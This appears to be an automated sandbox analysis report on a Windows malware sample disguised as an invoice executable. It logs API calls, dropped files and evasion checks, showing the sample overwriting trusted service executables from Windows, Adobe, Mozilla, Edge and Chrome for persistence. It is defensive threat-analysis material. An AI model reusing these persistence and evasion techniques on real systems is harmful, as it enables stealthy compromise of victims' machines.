          Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FXSSVC.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe0.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: INV_NE_02_2034388.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@9/14@7/2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_0046A06A GetLastError,FormatMessageW, 0_2_0046A06A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle, 0_2_004581CB
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_004587E1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0046B333
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0047EE0D
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0046C397
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00404E89
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 0_2_00BACBD0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Users\user\AppData\Roaming\7c03ee2ee2c8fb2a.bin
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7c03ee2ee2c8fb2a9e7986a9-b
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-7c03ee2ee2c8fb2a-inf
          Source: C:\Windows\System32\AppVClient.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-7c03ee2ee2c8fb2a9ea72c54-b
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Users\user~1\AppData\Local\Temp\aut1551.tmp
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: INV_NE_02_2034388.exe ReversingLabs: Detection: 81%
          Source: unknown Process created: C:\Users\user\Desktop\INV_NE_02_2034388.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"
          Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
          Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
          Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
          Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
          Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"
          Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Section loaded: webio.dll
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\alg.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\alg.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\alg.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: appvpolicy.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: wtsapi32.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: netapi32.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: samcli.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: logoncli.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: mpr.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\AppVClient.exe Section loaded: appmanagementconfiguration.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: credui.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxstiff.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxsresm.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: ualapi.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\FXSSVC.exe Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dbghelp.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: mpr.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: secur32.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: ntmarta.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: version.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: mpr.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: secur32.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: ntmarta.dll
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\AppVClient.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
          Source: INV_NE_02_2034388.exe Static file information: File size 1790464 > 1048576
          Source: INV_NE_02_2034388.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1257051766.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: PresentationFontCache.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr
          Source: alg.exe.0.dr Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
          Source: msdtc.exe.0.dr Static PE information: real checksum: 0x2f054 should be: 0x198b5f
          Source: elevation_service.exe.0.dr Static PE information: section name: .00cfg
          Source: elevation_service.exe.0.dr Static PE information: section name: .gxfg
          Source: elevation_service.exe.0.dr Static PE information: section name: .retplne
          Source: elevation_service.exe.0.dr Static PE information: section name: _RDATA
          Source: elevation_service.exe.0.dr Static PE information: section name: malloc_h
          Source: maintenanceservice.exe.0.dr Static PE information: section name: .00cfg
          Source: maintenanceservice.exe.0.dr Static PE information: section name: .voltbl
          Source: maintenanceservice.exe.0.dr Static PE information: section name: _RDATA
          Source: msdtc.exe.0.dr Static PE information: section name: .didat
          Source: armsvc.exe.0.dr Static PE information: section name: .didat
          Source: alg.exe.0.dr Static PE information: section name: .didat
          Source: FXSSVC.exe.0.dr Static PE information: section name: .didat
          Source: elevation_service.exe0.0.dr Static PE information: section name: .00cfg
          Source: elevation_service.exe0.0.dr Static PE information: section name: .gxfg
          Source: elevation_service.exe0.0.dr Static PE information: section name: .retplne
          Source: elevation_service.exe0.0.dr Static PE information: section name: _RDATA
          Source: elevation_service.exe0.0.dr Static PE information: section name: malloc_h
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00428945 push ecx; ret 0_2_00428958
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00402F12 push es; retf 0_2_00402F13
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8B180 push 00B8B0CAh; ret 0_2_00B8B061
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8B180 push 00B8B30Dh; ret 0_2_00B8B1E6
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8B180 push 00B8B2F2h; ret 0_2_00B8B262
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8B180 push 00B8B255h; ret 0_2_00B8B2ED
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8B180 push 00B8B2D0h; ret 0_2_00B8B346
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8B180 push 00B8B37Fh; ret 0_2_00B8B3B7
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00B8520C push 00B8528Fh; ret 0_2_00B8522D
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA852Eh; ret 0_2_00BA7F3A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8514h; ret 0_2_00BA7F66
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA7E66h; ret 0_2_00BA8057
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA817Ah; ret 0_2_00BA808B
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA82E5h; ret 0_2_00BA80D9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA826Ah; ret 0_2_00BA819E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA849Ch; ret 0_2_00BA81E4
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8321h; ret 0_2_00BA82E0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA7FBFh; ret 0_2_00BA831F
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA7FA8h; ret 0_2_00BA834C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA84BAh; ret 0_2_00BA83E2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8426h; ret 0_2_00BA84D8
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8075h; ret 0_2_00BA84FD
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA808Ch; ret 0_2_00BA8512
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8B6Fh; ret 0_2_00BA8596
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8E94h; ret 0_2_00BA85C9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA878Bh; ret 0_2_00BA8734
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8D45h; ret 0_2_00BA87D3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8E5Fh; ret 0_2_00BA885F
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8AB5h; ret 0_2_00BA8B13
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8784h; ret 0_2_00BA8CA1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Code function: 0_2_00BA8550 push 00BA8DC9h; ret 0_2_00BA8E1C
          Source: INV_NE_02_2034388.exe Static PE information: section name: .reloc entropy: 7.938066838476511
          Source: elevation_service.exe.0.dr Static PE information: section name: .reloc entropy: 7.952862113167232
          Source: AppVClient.exe.0.dr Static PE information: section name: .reloc entropy: 7.943002306706308
          Source: FXSSVC.exe.0.dr Static PE information: section name: .reloc entropy: 7.949279926947667
          Source: elevation_service.exe0.0.dr Static PE information: section name: .reloc entropy: 7.950770360029562

          Persistence and Installation Behavior

          Source: C:\Windows\System32\AppVClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\7c03ee2ee2c8fb2a.bin
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Windows\System32\FXSSVC.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe System file written: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Windows\System32\FXSSVC.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe File created: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00BACBD0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_005352A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 16_2_009952A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 18_2_015A52A0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeAPI/Special instruction interceptor: Address: E9EEA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E rdtsc 17_2_03C7096E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Dropped PE file which has not been started: C:\Windows\System32\msdtc.exe
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-111057
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeAPI coverage: 4.9 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe TID: 7788 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe TID: 7788 Thread sleep time: -30000s >= -30000s
